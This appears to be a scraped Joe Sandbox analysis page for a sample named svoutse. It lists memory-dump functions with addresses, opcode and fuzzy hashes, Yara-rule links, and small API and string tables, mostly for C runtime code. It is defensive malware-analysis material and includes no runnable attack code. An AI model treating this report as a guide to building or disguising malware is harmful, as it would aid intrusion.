Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a19b0785404768001ca1441a23d4f10b17b7073fb3e5ca9bc335ffe8d499310
Instruction ID: f0a0d31d96b37a7f8850103a4ce83e99d876556fff9f08e5a0f6a84302da4819
Opcode Fuzzy Hash: 4a19b0785404768001ca1441a23d4f10b17b7073fb3e5ca9bc335ffe8d499310
Instruction Fuzzy Hash: F8225FB3F515144BDB0CCA9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9159A44

Function 008E6E39 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0b9396ba928eb8604c5a25f38291d80ca1fd55b44576c104ae3110e6c4bc2b6
Instruction ID: e9009240c8d51ad7803ab20cc5acce5ed9727770f1c55a935a465bb7af23fbca
Opcode Fuzzy Hash: e0b9396ba928eb8604c5a25f38291d80ca1fd55b44576c104ae3110e6c4bc2b6
Instruction Fuzzy Hash: 99B17C31210649DFD715CF29C48AB657BE0FF46364F298658F89ACF2A1C735E992CB40

Function 008A4AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d52e516118a513ee48947acea2aa97a4482a520fa2d05c96eb4bff8a0ca0d3
Instruction ID: 37385601936d36e62095b07eb2b1e971287166192ca832fca38a7c5e2018d206
Opcode Fuzzy Hash: a7d52e516118a513ee48947acea2aa97a4482a520fa2d05c96eb4bff8a0ca0d3
Instruction Fuzzy Hash: 25516F716087918FD719CF2D851563ABBE1FFD6300F084A9EE4EA87252DB74D604CBA2

Function 008E76AB Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320c112fb0681ca7d9ae2d92c914dd2d5c8eab0366ed21ce38e69ed1c3560e57
Instruction ID: 9264c05a12ab7585c50f8e3e7227eb117116beecd1bf2623f4aebafb435d7ce2
Opcode Fuzzy Hash: 320c112fb0681ca7d9ae2d92c914dd2d5c8eab0366ed21ce38e69ed1c3560e57
Instruction Fuzzy Hash: EF21B673F204394B770CC47E8C5227DB6E1C68C641745423AE8A6EA2C1D968D917E2E4

Function 04D30BB1 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3728188635.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4d30000_svoutse.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 462e4a91f55afedcd618cfc5414920943d73b126bf8bc28c6a8cd1bae5a66129
Instruction ID: 865774384c0b4b22059bac74f391c38ac0d181bf8615e2340457fc72fbf421df
Opcode Fuzzy Hash: 462e4a91f55afedcd618cfc5414920943d73b126bf8bc28c6a8cd1bae5a66129
Instruction Fuzzy Hash: 68115CA710E194AEEB0345606A506F77F25FB47B353304592E0C78944AE255A986E521

Function 008E758B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997b5540fb1e3c4b1c677f21047e416be82e96a5f9be5e53691f1740e1f881cc
Instruction ID: 74140aff494709d29b49eb05c823603a3a784499090bc70a5566e9197b3ef71d
Opcode Fuzzy Hash: 997b5540fb1e3c4b1c677f21047e416be82e96a5f9be5e53691f1740e1f881cc
Instruction Fuzzy Hash: 8F11C633F30C295B675C816D8C132BAA1D2EBD824034F533AD826E7284E9A4DE23D290

Function 008E8650 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 3a26c6ebd0fde538408b794b09c7b21b9743aef0e4108ca964f6aed00c441988
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: C91138772000C1C3DA158A2FC9BC5BFA7A5FAF732472D42BAD04ACB774D922D9419500

Function 008D638B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cafe636354de506c52fb255544b58d74b81fa614026e620b23bc7b28199e2856
Instruction ID: 9a0782f5b3e4410c608ad4497e8bd575a97b9f6dd166744fc99341f95d58cf2c
Opcode Fuzzy Hash: cafe636354de506c52fb255544b58d74b81fa614026e620b23bc7b28199e2856
Instruction Fuzzy Hash: 4EE08C3000064CAECE397B19DC14D5E3B1BFB42744F245919FC0486322DB29FCA1D682

Function 008DA0F2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 2ad3f66508b59f5a5ae91ae24fa7c1fbe2fe8a2e670e9ada09e8fe8a1f87e136
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 9FE08C32911228EBCB18DBCCC90598AF3ECFB48B00F210197B502D3240C270DE00CBD2

Function 008D46A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 008D46D7
___except_validate_context_record.LIBVCRUNTIME ref: 008D46DF
_ValidateLocalCookies.LIBCMT ref: 008D4768
__IsNonwritableInCurrentImage.LIBCMT ref: 008D4793
_ValidateLocalCookies.LIBCMT ref: 008D47E8

Strings

csm, xrefs: 008D477D

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 81ce096eec5e6eaa901a451666cb52b16d8c8a4a48f3a288fc86ca49a85acd97
Instruction ID: 3287d83e1337c4fbf0d6b28babeec6c5afb29dec3482050342d92323929431bc
Opcode Fuzzy Hash: 81ce096eec5e6eaa901a451666cb52b16d8c8a4a48f3a288fc86ca49a85acd97
Instruction Fuzzy Hash: F751C534A0024C9BCF10DF68D885AAE7BB6FF46314F5492A7E819DB352D732DA05CB91

Function 008D6FF9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 008D703B

Strings

.cmd, xrefs: 008D7059
.com, xrefs: 008D707B
.bat, xrefs: 008D706A
.exe, xrefs: 008D7048

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 103f607900e454442bf64c0f4fd8bb58ee9a39238460a0f502b2e2fa25345fc7
Instruction ID: 765003c2febc5e9a222f30eeeebc1c6abc09253585856fe21ab6934efa886185
Opcode Fuzzy Hash: 103f607900e454442bf64c0f4fd8bb58ee9a39238460a0f502b2e2fa25345fc7
Instruction Fuzzy Hash: C801DB37648A56652624706D9C0263717D8FB86FB4B26032BF954F73C2FE58DC0291A1

Function 008A2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 008A2F1F
__Mtx_unlock.LIBCPMT ref: 008A2F8C
__Cnd_broadcast.LIBCPMT ref: 008A2FA3
__Mtx_unlock.LIBCPMT ref: 008A30B5
__Mtx_unlock.LIBCPMT ref: 008A315B

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 0198f4a95cf48a21ac2d8cd502addb4ff55dfd5c3ec585dbca5c6d737f4c7d88
Instruction ID: 898033e96a97265390e6fabca8d3d3688fa2854d8b77abddbd104d6146e5af21
Opcode Fuzzy Hash: 0198f4a95cf48a21ac2d8cd502addb4ff55dfd5c3ec585dbca5c6d737f4c7d88
Instruction Fuzzy Hash: 37A1D0B1A00615DFEB20DF68C945BAAB7B8FF16314F048529F815D7B41EB34EA04CB92

Function 008A6E00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 008A6FA5

Strings

, xrefs: 008A7080
VUUU, xrefs: 008A6E51
invalid stoi argument, xrefs: 008A6FA0

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: $VUUU$invalid stoi argument
API String ID: 909987262-3954507777
Opcode ID: 4434dd1c65dfe277fea730760cd5f0e4733d7929322d6ce792b1dda64273aca0
Instruction ID: 29118c12025b6510353f25f63fe583b827d715f27a537bd8390d96340f51787d
Opcode Fuzzy Hash: 4434dd1c65dfe277fea730760cd5f0e4733d7929322d6ce792b1dda64273aca0
Instruction Fuzzy Hash: 9F51E771644305BFE720AB69CC02FAB77E9FF85B04F000519F654EB2D0EB70A9048B96

Function 008DC8E0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008DC967

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3712461292.0000000000BC8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714584721.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3714884942.0000000000D72000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8a0000_svoutse.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 2b3ef1659db62b1fbef5682a184aabdbde821b59cbe5c7fbcbf5c010ab3c6d43
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 43B1367290469B9FDB11CF68C852BAEBBE5FF55310F24826BE845EB341D6348D01CB51

Function 008BB9D2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 008BBA2A
__Xtime_diff_to_millis2.LIBCPMT ref: 008BBA44
_xtime_get.LIBCPMT ref: 008BBA67
__Xtime_diff_to_millis2.LIBCPMT ref: 008BBA73

Memory Dump Source

Source File: 0000000F.00000002.3705869185.00000000008A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008A0000, based on PE: true

Associated: 0000000F.00000002.3705432910.00000000008A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3705869185.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707087021.0000000000909000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.000000000090B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000B81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.3707400691.0000000000BB9000.00000040.00000001.01000000.00000007.sdmpDownload File
